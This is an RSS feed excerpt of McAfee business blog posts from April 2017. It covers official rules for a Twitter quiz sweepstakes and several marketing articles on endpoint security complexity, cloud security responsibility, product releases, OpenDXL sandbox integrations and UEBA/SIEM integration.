No purchase necessary. A purchase will not increase your chances of winning. McAfee’s Misaligned #IncentiveQuiz Sweepstakes will be conducted for two weeks, each week being the start of a new entry period. All entries for each day of the McAfee Misaligned #IncentiveQuiz Sweepstakes must be received during the time allotted for the Misaligned #IncentiveQuiz Sweepstakes. Pacific Daylight Time shall control the McAfee Misaligned #IncentiveQuiz Sweepstakes. One winner will be chosen for each of the five days of the McAfee Misaligned #IncentiveQuiz Sweepstakes. The McAfee Misaligned #IncentiveQuiz Sweepstakes duration is as follows:

McAfee Misaligned #IncentiveQuiz Sweepstakes:

  • Wednesday April 26th  – Friday, April 28th
    • Two winners announced Monday, May 1st, 12:00pm PST
  • Monday, May 1st – Friday, May 5th
    • Two winners announced: Monday, May 8th, 12:00pm PST

For the McAfee Misaligned #IncentiveQuiz Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Misaligned #IncentiveQuiz Sweepstakes:

  1. Take the Misaligned #IncentiveQuiz on the McAfee “Securing Tomorrow” website
  2. You must share your quiz results on Twitter and tag @McAfee and #IncentiveQuiz and #Sweepstakes

One winner will be chosen for each week of the McAfee Misaligned #IncentiveQuiz Sweepstakes from the viable pool of entries that shared their quiz results and included @McAfee, #IncentiveQuiz and #Sweepstakes. McAfee and the McAfee social team will choose winner from all the viable entries. The winner of each week will be announced by 12:00pm PDT the following Monday on the @McAfee_Business or @McAfee Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win one day of the 2 weeks. 

2. Eligibility: 

McAfee Misaligned #IncentiveQuiz Sweepstakes is open to all legal residents of the 50 United States or District of Columbia who are 18 years of age or older on the date the McAfee Misaligned #IncentiveQuiz Sweepstakes begins and live in a jurisdiction where this prize and McAfee Misaligned #IncentiveQuiz Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

3. Winner Selection:

Winners will be selected from the eligible entries received during each of the McAfee Misaligned #IncentiveQuiz Sweepstakes periods. Sponsor will select the names of [4] potential winners of the prizes in a random drawing from among all eligible Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. will only be eligible to win one of the weeks. By participating, entrants agree to be bound by the Official McAfee Misaligned #IncentiveQuiz Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

4. Prizes: 

The prize for each McAfee Misaligned #IncentiveQuiz Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Misaligned #IncentiveQuiz Sweepstakes and all matters or disputes arising from the McAfee Misaligned #IncentiveQuiz Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.
Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

5. General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned #IncentiveQuiz Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Misaligned #IncentiveQuiz Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Misaligned #IncentiveQuiz Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Misaligned #IncentiveQuiz Sweepstakes-related activity, or participation in the McAfee Misaligned #IncentiveQuiz Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases: By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  2. Use of Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.  By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee Misaligned #IncentiveQuiz Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Misaligned #IncentiveQuiz Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Misaligned #IncentiveQuiz Sweepstakes and all matters or disputes arising from the McAfee Misaligned #IncentiveQuiz Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law &  Disputes:    EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS SWEEPSTAKES OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy Personal information obtained in connection with this prize McAfee Misaligned #IncentiveQuiz Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 8th 2017 and before May 7th 2018 to the address listed below, Attn: Misaligned Incentives Quiz Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Margie Easter.  VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters2821 Mission College Blvd.Santa Clara, CA 95054 USA

The post Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! Terms & Conditions appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/test-your-knowledge-with-the-misaligned-incentivequiz-sweepstakes-terms-conditions/feed/ 0
Are You Getting Buried by the Endpoint Security Snowball Effect? https://securingtomorrow.mcafee.com/business/endpoint-security/snowball-effect/ https://securingtomorrow.mcafee.com/business/endpoint-security/snowball-effect/#respond Tue, 25 Apr 2017 19:00:01 +0000 https://securingtomorrow.mcafee.com/?p=72624 This blog was written by Joakim Lialias. It starts out innocently enough: there’s a dangerous emerging threat to endpoints that can sneak past current defenses. A new startup has just the solution to stop it. Sure, you’re not thrilled about adding another agent and interface to your already overtaxed security team’s portfolio, but it’s just […]

The post Are You Getting Buried by the Endpoint Security Snowball Effect? appeared first on McAfee Blogs.

]]>
This blog was written by Joakim Lialias.

It starts out innocently enough: there’s a dangerous emerging threat to endpoints that can sneak past current defenses. A new startup has just the solution to stop it. Sure, you’re not thrilled about adding another agent and interface to your already overtaxed security team’s portfolio, but it’s just this one small addition, and it really does provide important protection.

Fast forward to a year later, and there’s another new threat. Now, you’re looking at another new endpoint product, with yet another new agent and interface. Six months later, it happens again. And again. All of a sudden, your security teams are managing a dozen different agents across your environment. They’re struggling just to keep their heads above water. And because there’s so much complexity, it now takes even longer to detect and respond to threats.

You’ve just been hit by the “endpoint security snowball effect.” And you’re not alone.

Proliferating Complexity

According to a recent Forrester survey commissioned by McAfee, the average organization is now monitoring 10 different endpoint security agents. When they need to investigate and remediate a new threat—those times when literally every second matters—they’re swiveling between an average of five different interfaces.

How did we get here? A number of industry and organizational trends converged to create the current predicament, including:

  • Silver bullet startups: The last several years have witnessed an explosion of new endpoint security products hitting the market. Many are very innovative. The problem is that none of them have command over the full security architecture. They’re designed to solve niche problems, making them hard to integrate into an overarching, automated security framework.
  • Conglomerate growth through acquisition: There are a few comprehensive security players in the market—but most have grown through acquisition, not by innovating their own products. Their endpoint tools may all have the same logo, but the products themselves remain distinct in their development and the engineering resources they require.
  • Diverse buying centers within organizations: Many organizations have experienced their own rapid growth, both geographically and through acquisitions. The result is that there may be several different buying centers in an organization for endpoint security, with different people making purchasing decisions to meet specific needs

It hasn’t helped that, for years, the accepted best practice for endpoint security was to layer multiple “best-of-breed” solutions. As many organizations are now seeing firsthand, that approach quickly snowballs—and eventually becomes an avalanche—creating more complexity than any security team can keep up with.

These days, more organizations—over 50 percent according to the Forrester survey—are turning back to single-vendor solutions. They’re prioritizing endpoint solutions that can do more things, more efficiently, with better accuracy and less complexity.

Envisioning a Better Solution

Fortunately, this is not the first time that CISO’s have seen this problem. A decade ago, organizations were similarly buried in disparate tools and processes for the basic IT architecture.

In response, the industry moved toward the concept of the “service-oriented architecture” (SOA), sometimes called the enterprise service bus. The idea was to create a single, common framework that everything could plug into, where disparate solutions could communicate, and IT could move away from constant manual integration.

So the model already exists. Now, we need to apply it to endpoint security. What should that look like?

First, individual endpoint security operations can no longer be built around siloed point products. Each layer of endpoint security should be modular, like a blade snapping into a server chassis. Components should be able to exchange data in real time, so that, for example, when a new threat is detected by one piece of the system, the rest of the defense fabric is instantly aware of it and can automatically inoculate the rest of the environment. Everything should be visible from a single interface, so that the friction between different agents and processes disappears. And the security framework should be highly adaptable, so you can continually add new capabilities without requiring a top-to-bottom rip and replace.

It’s a different approach than most solutions out there today. But the sooner organizations start demanding it from their security vendors as a baseline business requirement, the sooner we’ll see snowballing endpoint complexity melt away.

Find Out More

McAfee is making this vision a reality right now. Our Dynamic Endpoint solution was designed from the ground up to break down barriers between siloed solutions, linking endpoint capabilities across the threat defense lifecycle into a single security fabric. We’re making endpoint defenses more adaptive and automated. And we’re helping security teams in every industry operate more efficiently—and stamp out security snowballs before they start.

 

The post Are You Getting Buried by the Endpoint Security Snowball Effect? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/snowball-effect/feed/ 0
The Growing Concerns Around Cloud Adoption in Saudi Arabia and the UAE https://securingtomorrow.mcafee.com/business/growing-concerns-around-cloud-adoption-saudi-arabia-uae/ https://securingtomorrow.mcafee.com/business/growing-concerns-around-cloud-adoption-saudi-arabia-uae/#respond Tue, 25 Apr 2017 16:19:15 +0000 https://securingtomorrow.mcafee.com/?p=72625 Cloud adoption is steadily on the rise, creating for a growing concern around cloud-borne threats, specifically in Saudi Arabia and United Arab Emirates. In fact, the latest IDC trends report states that security continues to be the number one challenge facing Middle East-based CIOs, with spending on security systems in the region set to pass […]

The post The Growing Concerns Around Cloud Adoption in Saudi Arabia and the UAE appeared first on McAfee Blogs.

]]>
Cloud adoption is steadily on the rise, creating for a growing concern around cloud-borne threats, specifically in Saudi Arabia and United Arab Emirates. In fact, the latest IDC trends report states that security continues to be the number one challenge facing Middle East-based CIOs, with spending on security systems in the region set to pass $2bn in 2017.

This is due to the shift from legacy IT systems to cloud-based services, and the security risks that move have created.

To study the security implications of cloud adoption, McAfee surveyed 1,400 IT security professionals globally, with 125 respondents from either Saudi Arabia or United Arab Emirates—70% came from organizations of over 1,000 employees and the 30% from enterprise of between 500-1,000 employees.

Out of those 125 surveyed, a whopping 98% reported using some type of cloud service, which was much higher than the global average of 93%. And though 94% trust cloud computing more than they did 12 months ago, a top concern by the Gulf Cooperation Council (GCC) respondents to using SaaS after cost is “skills required by your IT security staff.”

In fact, the main deterrent to cloud adoption in the region is skilled staff that understands cloud architecture.  51% affirmed that they have slowed adoption due to a lack of cybersecurity skills (compared to global 49%) and only 8% said they didn’t have a skills shortage compared to global response of 15%

But beyond skills, the other top concern amongst respondents using IaaS was a tie between the ability of the cloud provider to meet service levels/SLAs for performance and availability and departments commissioning IaaS workloads without involving IT department (i.e. Shadow IT).

In fact, Shadow IT does seem to be a larger concern in the GCC compared to the global average perhaps a correlation to the skills shortage in IT.  Business units are procuring cloud services on their own (see chart below). In fact, over 46% of cloud services in these GCC countries are commissioned outside of the IT department as compared to global average of almost 40%. Plus, 85% of respondents affirmed that Shadow IT impairs their organization’s ability to keep cloud services safe and secure as compared to the global average of 66%. So, what’s the response to these concerns? Security as a service and security in the cloud for the cloud.  In fact, cloud adoption is going to continue to drive the demand of cloud-based security for their cloud-based applications and data.

And to learn more information on how security can address the growing concerns around cloud adoption, check out our report, Building Trust in a Cloudy Sky.

Join the conversation: Let us know what you think about Cloud Security by tweeting to as @McAfee or @McAfee_Business.

The post The Growing Concerns Around Cloud Adoption in Saudi Arabia and the UAE appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/growing-concerns-around-cloud-adoption-saudi-arabia-uae/feed/ 0
Who Owns Your Cloud Security Stack? https://securingtomorrow.mcafee.com/business/cloud-security/owns-cloud-security-stack/ https://securingtomorrow.mcafee.com/business/cloud-security/owns-cloud-security-stack/#respond Mon, 24 Apr 2017 23:39:12 +0000 https://securingtomorrow.mcafee.com/?p=72046 This blog was written by Nat Smith. Sometimes I kick off a client conversation by asking, “What is your strategy for cloud security?” It is surprising how often they not only have no such strategy, but do not even think they need one. They take the security options offered by their cloud service providers (CSP) […]

The post Who Owns Your Cloud Security Stack? appeared first on McAfee Blogs.

]]>
This blog was written by Nat Smith.

Sometimes I kick off a client conversation by asking, “What is your strategy for cloud security?”

It is surprising how often they not only have no such strategy, but do not even think they need one. They take the security options offered by their cloud service providers (CSP) and assume their workloads are safe. Like most assumptions, this one can leave you looking foolish, because cloud security is seldom so simple.

Every workload is a stack of physical and virtual resources: network, servers, a hypervisor, storage, OSs, middleware, applications, data, and users. In an on-prem environment, we protect each workload with a parallel security stack: firewall, IPS, web and email proxies, endpoint protection, advanced malware detection, application controls, data encryption, identity and access management, and behavioral analytics. This not only protects the workloads (and the services they provide to our organizations), it keeps us compliant.

When we move to public cloud, this clear line of security responsibility can become unclear. We outsource a slice of the workload stack to our CSP and leverage its optional security controls. These typically cover the provider’s own infrastructure and platform services, but not the higher tiers of the workload stack that we still configure, manage, and maintain ourselves. Too often we forget that we still own security for everything from the guest OS on up.

Amazon is admirably clear about how it divides the security domain.

“When evaluating the security of a cloud solution, it is important for customers to understand and distinguish between:

  • Security measures that the cloud service provider (AWS) implements and operates – “security of the cloud”
  • Security measures that the customer implements and operates, related to the security of customer content and applications that make use of AWS services – “security in the cloud”

While AWS manages security of the cloud, security in the cloud is the responsibility of the customer. Customers retain control of what security they choose to implement to protect their own content, platform, applications, systems and networks, no differently than they would for applications in an on-site datacenter.”

With Amazon at least, we know exactly where we stand. It is our job to secure our own OS, apps, data and users. The tools we choose and the way we fold them into our security and compliance frameworks are ours to decide as well. Other providers can and do draw the line differently.

The first challenge of protecting cloud workloads is knowing what you still own in the security stack. Only then are you sure to implement the full security stack in the cloud.

The post Who Owns Your Cloud Security Stack? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/owns-cloud-security-stack/feed/ 0
Protecting your Network in the Public Cloud. Yeah, you still need to do that… https://securingtomorrow.mcafee.com/business/protecting-network-public-cloud-yeah-still-need/ https://securingtomorrow.mcafee.com/business/protecting-network-public-cloud-yeah-still-need/#respond Fri, 21 Apr 2017 17:42:01 +0000 https://securingtomorrow.mcafee.com/?p=71866 This post was written by Loretta Nierat. So you made the jump into the public cloud, and you chose to go with AWS.  So far, so good.  But, what about security? Is AWS sufficient when it comes to keeping your data secure, or being able to accurately monitor your network?  Or do you need additional […]

The post Protecting your Network in the Public Cloud. Yeah, you still need to do that… appeared first on McAfee Blogs.

]]>
This post was written by Loretta Nierat.

So you made the jump into the public cloud, and you chose to go with AWS.  So far, so good.  But, what about security? Is AWS sufficient when it comes to keeping your data secure, or being able to accurately monitor your network?  Or do you need additional protection?

As AWS points out, it’s important to understand the Shared Responsibility model. Depending on which AWS services you are embracing, AWS will provide security up to a certain level, and then it’s up to you to add further protection to ensure you are safe with the workloads you are running in the public cloud.

To understand the impact the public cloud (AWS) has on managing your infrastructure, and therefore what additional measures you need to take to ensure total security, let’s take a closer look at the Shared Responsibility model for Infrastructure Services, which includes AWS services such as EC2, Amazon EBC, and Amazon VPC. AWS will secure their global infrastructure that you are running on and provide physical and virtualization security.  But you are responsible for protecting the operating systems that you are using inside the virtual servers, as well as your application and your network.  In short, you would want to secure your servers and network as if they were in your own data center.

Now, the question is: even though you recognize the need for additional security in AWS, will the tools used in your on-premise data center or private cloud data center work well in the AWS environment? Oftentimes, the answer is no. To start, there are additional vulnerabilities within the public cloud, such as east-west exposure, that may require additional context or new techniques that are not needed in other data center environments. In addition, one of the prime reasons that AWS is so scalable and affordable is their dynamic and massively scalable network architecture. It allows them to spin up or retire new workloads for you with ease, but it comes at a cost of not controlling the infrastructure and underlying network. Traditional security controls allowing deeper traffic inspection assume you have control over traffic coming and going from your workloads – the obfuscated nature of the infrastructure and network makes this assumption invalid and requires a new approach to offer the same kind of protection.

First of all, you should leverage AWS VPC which is another layer of network security.  It provides you with a private, non-routable subnet, as well as allows you to also create IPSEC tunnels between your home network and your AWS VPC.

Additionally, you will need network protection for your east-west traffic, which will inspect network traffic between even your own virtual machines.  After all, if malware gets into your VPC, it can travel fast laterally without being detected and infect all of your workloads.  You must have access to see all inter-workload traffic (east-west vulnerabilities). To accomplish this, a process must be in place to reroute your workload traffic to virtual IPS sensors on an individual basis. This requires a different approach or a different architecture.

McAfee’s technology that will provide that protection is McAfee Virtual Network Security Platform (vNSP), and it is architected for AWS. vNSP delivers east-west network visibility with cutting-edge inspection techniques. It also discovers and blocks sophisticated threats in cloud architectures with accuracy and simplicity, enabling organizations to restore compliance and embrace cloud security with confidence. Advanced technologies include signature-less detection, in-line emulation, signature-based vulnerability patching, and support for Amazon Web Services (AWS) and network virtualization. With streamlined workflows, multiple integration options, and simplified licensing, organizations can easily manage and scale their security in the most complex cloud architectures.

One additional advantage is that vNSP provides dedicated threat protection across virtualized infrastructure and data centers and as such, you can use the same solution for not only the public cloud but also your own data center.  vNSP enables you to have a single policy across environments, and it is designed to discover and block sophisticated threats in virtualized environments, from private clouds to software-defined data centers (SDDCs) to public clouds.

The post Protecting your Network in the Public Cloud. Yeah, you still need to do that… appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/protecting-network-public-cloud-yeah-still-need/feed/ 0
New Versions of Cloud Workload Discovery and McAfee MOVE AntiVirus Now Available! https://securingtomorrow.mcafee.com/business/cloud-security/new-versions-cloud-workload-discovery-mcafee-move-antivirus-now-available/ https://securingtomorrow.mcafee.com/business/cloud-security/new-versions-cloud-workload-discovery-mcafee-move-antivirus-now-available/#respond Thu, 20 Apr 2017 15:00:32 +0000 https://securingtomorrow.mcafee.com/?p=69867 This blog post was written by Teresa Wingfield. As part of our continued enhancements to our server security solutions, Cloud Workload Discovery 4.5.1 was released on March 27, 2017 and the McAfee MOVE AntiVirus 4.5.1 release followed on April, 20 2017.  These solutions have some valuable new features and benefits that I’d like to share […]

The post New Versions of Cloud Workload Discovery and McAfee MOVE AntiVirus Now Available! appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

As part of our continued enhancements to our server security solutions, Cloud Workload Discovery 4.5.1 was released on March 27, 2017 and the McAfee MOVE AntiVirus 4.5.1 release followed on April, 20 2017.  These solutions have some valuable new features and benefits that I’d like to share with you.

Cloud Workload Discovery 4.5.1

Let’s start with Cloud Workload Discovery 4.5.1.  Cloud Workload Discovery, covering VMware, OpenStack, AWS and Microsoft Azure, provides end-to-end visibility into cloud workloads and their underlying platforms. You can get an in-depth description of Cloud Workload Discovery in our previous blog, “New Server Security Release Makes Borderless Cloud Security a Reality”.  Prior to version 4.5.1, Cloud Workload Discovery was available to work with two of McAfee’s antivirus solutions, McAfee VirusScan Enterprise and McAfee MOVE AntiVirus.

Cloud Workload Discovery 4.5.1 extends visibility to McAfee Endpoint Security for AWS and Microsoft Azure workloads.  McAfee Endpoint Security is a collaborative, extensible framework for protecting Microsoft Windows and Linux servers against zero-day exploits and advanced attacks. Now that Cloud Workload Discovery supports McAfee Endpoint Security, we are adding two of its modules, Threat Prevention and Firewall, to all three of our server security suites, McAfee Server Security Suite Essentials and McAfee Server Security Suite Advanced for hybrid cloud protection and McAfee Public Cloud Security Suite.

Threat Prevention scans for viruses, spyware, unwanted programs and other threats – automatically with user access or on demand at any time.  The Firewall module monitors communication between the computer and resources on the network and the Internet to intercept suspicious communications.

 McAfee MOVE AntiVirus 4.5.1

McAfee MOVE AntiVirus is a key component of McAfee Server Security Suite Essentials and  McAfee Server Security Suite Advanced.  McAfee MOVE AntiVirus can now protect Linux virtual machines in agentless deployments as part of the 4.5.1 release, including 64-bit versions of SUSE Linux Enterprise Server 12, Red Hat Enterprise Linux 7 and Ubuntu 14.04 LTS.  This includes all the Linux distributions supported by VMware NSX 6.3. In addition, McAfee MOVE Antivirus (Agentless) is now certified for VMware NSX 6.3 so that customers can be sure that these solutions work seamlessly together.

Learn More

Here’s some links for our server security suites and McAfee MOVE AntiVirus if you’d like to find out more about these solutions:

McAfee Server Security Suite Essentials

McAfee Server Security Suite Advanced

McAfee Public Cloud Server Security Suite

McAfee MOVE AntiVirus

The post New Versions of Cloud Workload Discovery and McAfee MOVE AntiVirus Now Available! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/new-versions-cloud-workload-discovery-mcafee-move-antivirus-now-available/feed/ 0
OpenDXL Case Study: Sandbox Mania featuring Cuckoo and Wildfire https://securingtomorrow.mcafee.com/business/security-operations/opendxl-case-study-sandbox-mania-featuring-cuckoo-wildfire/ https://securingtomorrow.mcafee.com/business/security-operations/opendxl-case-study-sandbox-mania-featuring-cuckoo-wildfire/#respond Wed, 19 Apr 2017 15:00:52 +0000 https://securingtomorrow.mcafee.com/?p=71715 This blog was written by Barbara Kay. To unleash creativity, my middle school art teacher occasionally offered up all the painting, woodcarving, pottery, and collage resources in the studio, with no guidelines or constraints other than our imaginations and the available class time. The results ranged from the mundane to the inspired. I carved a […]

The post OpenDXL Case Study: Sandbox Mania featuring Cuckoo and Wildfire appeared first on McAfee Blogs.

]]>

This blog was written by Barbara Kay.

To unleash creativity, my middle school art teacher occasionally offered up all the painting, woodcarving, pottery, and collage resources in the studio, with no guidelines or constraints other than our imaginations and the available class time. The results ranged from the mundane to the inspired. I carved a 3D lobster. (Sadly, no picture survives, but let’s pretend it is as wonderful as the one here carved by Ryousuke Ohtake).

OpenDXL as a Blank Canvas

As an open source integration framework, OpenDXL is like that art studio. Creative security analysts and developers can use the OpenDXL SDK (libraries, classes, and helper classes), the python client, and code examples on github to express their own ideas and activate their APIs. They can build everything from simple productivity boosters to sophisticated conditional workstreams.

Unfortunately, unlike the art classroom, OpenDXL projects aren’t easily visible. So, we at McAfee created a virtual studio, a contest to see what our sales engineers would create with OpenDXL. [We also captured some examples in our new Idea Guide, downloadable here.]

One of the first contest submissions, now published to github.com/opendxl-community, helps solve the age-old malware analysis dilemma: how many sandboxes are enough?

Simple POCs with high value

Jesse Netz, a sales engineer on the East Coast, used OpenDXL to integrate the open source Cuckoo sandbox and the Palo Alto Networks Wildfire sandbox with the DXL messaging fabric and the McAfee Advanced Threat Defense sandbox. These integrations can help enterprises get more value out of their existing resources and share the latest threat data for the fastest detection of emerging threats.

  1. A Cuckoo sandbox can pull changing malware file reputations maintained by the McAfee Threat Intelligence Exchange and include these reputations in its processing as well as the Cuckoo report. TIE provides visibility into the local prevalence of the file, helping the analyst understand how widespread an infection might be. In addition, customers who have the McAfee Advanced Threat Defense sandbox would see the ATD verdicts appear within the Cuckoo report, enriching the Cuckoo details about what the sample did while executing.
  2. DXL-integrated applications can use a lightweight DXL interface (service wrapper) instead of the Cuckoo APIs to access Cuckoo sandbox details (socket connections, registry writes, etc.) from anywhere, on-network or off-network. For this integration, Jesse reused a reference example provided in the OpenDXL SDK, the ePO API service wrapper.
  3. Wildfire verdicts update McAfee Threat Intelligence Exchange’s reputation database with new scores. Any application that listens to TIE reputation scores will get the updated information without having to integrate directly with Wildfire, and can immediately inoculate its systems by blocking the newly identified malware. This example converts verdicts to TIE reputations.

Done in Hours, Not Weeks

The three integrations took a total of about 30 hours, with the hardest part being learning each third party API. Once he had done the first OpenDXL integration, the subsequent ones were much easier. Without OpenDXL’s support for SSL, Authentication, and Authorization, Jesse estimates these integrations would have taken at least twice as long. Now, others don’t need to invest the time learning the Cuckoo and Wildfire APIs and doing point-to-point integrations; they can just leverage OpenDXL topics and Jesse’s new service wrapper.

Looking ahead, Jesse is considering his next OpenDXL development, but we won’t know until he formally submits it to the programming contest. In the meantime, please stay tuned to github.com/opendxl-community for more examples, and fuel your own projects with the new Idea Book.

The post OpenDXL Case Study: Sandbox Mania featuring Cuckoo and Wildfire appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/opendxl-case-study-sandbox-mania-featuring-cuckoo-wildfire/feed/ 0
The Power of an Integrated UEBA/SIEM Solution https://securingtomorrow.mcafee.com/business/security-operations/power-integrated-uebasiem-solution/ https://securingtomorrow.mcafee.com/business/security-operations/power-integrated-uebasiem-solution/#respond Mon, 17 Apr 2017 15:00:14 +0000 https://securingtomorrow.mcafee.com/?p=70980 This blog post was written by Kristen Jacobsen. If you’ve read our previous blog, “Leveraging UEBA Capabilities in Your Existing SIEM,” you understand how McAfee Enterprise Security Manager can perform many essential UEBA functions leveraging its built-in advanced analytics and behavior modeling. Doing It Better Together For several specific use cases, you may find that […]

The post The Power of an Integrated UEBA/SIEM Solution appeared first on McAfee Blogs.

]]>
This blog post was written by Kristen Jacobsen.

If you’ve read our previous blog, “Leveraging UEBA Capabilities in Your Existing SIEM,” you understand how McAfee Enterprise Security Manager can perform many essential UEBA functions leveraging its built-in advanced analytics and behavior modeling.

Doing It Better Together

For several specific use cases, you may find that you need a third-party UEBA product. Fortunately, through the McAfee ecosystem approach to security, you can integrate UEBA solutions from other vendors for expanded visibility of McAfee Enterprise Security Manager’s user monitoring and analytics. Such tight integrations with McAfee Enterprise Security Manager optimize security operations by:

  • Adding user and entity threat data to McAfee Enterprise Security Manager’s threat and contextual parameters to trigger rapid response actions, such as policy changes, alerts, and escalations.
  • Leveraging response activities for deeper forensic investigations.
  • Enabling enhanced reporting, visibility, and management. Data collected by the UEBA solution can be sent to the McAfee Enterprise Security Manager reporting engine, which can then create visualizations of that information and synthesize it within its existing operational reports, dashboards, and workflows.

The McAfee and UEBA Vendor Partnerships

McAfee Security Innovation Alliance partnerships include numerous UEBA vendors that offer an advanced UEBA solution with a flexible analytics engine covering insider threats, targeted attacks, and unknown threats. These smart and powerful platforms utilize machine learning and advanced analytics models that are well suited for large, complex enterprise environments.

McAfee Enterprise Security Manager and UEBA vendor integrations increase visibility to:

  • Insider threats across endpoints, servers, networks, and log data: It connects high-risk actions to users and provides clear context.
  • Privileged accounts: Time, authentication, access, application usage, and data movement are monitored and compared to baseline behavior parameters.
  • Targeted attacks: It quickly surfaces attack paths as they unfold, including malware that propagates laterally.
  • Healthcare compliance: Policy violations and risky user behaviors are identified by monitoring users, files, applications, and all types of medical and computing devices.

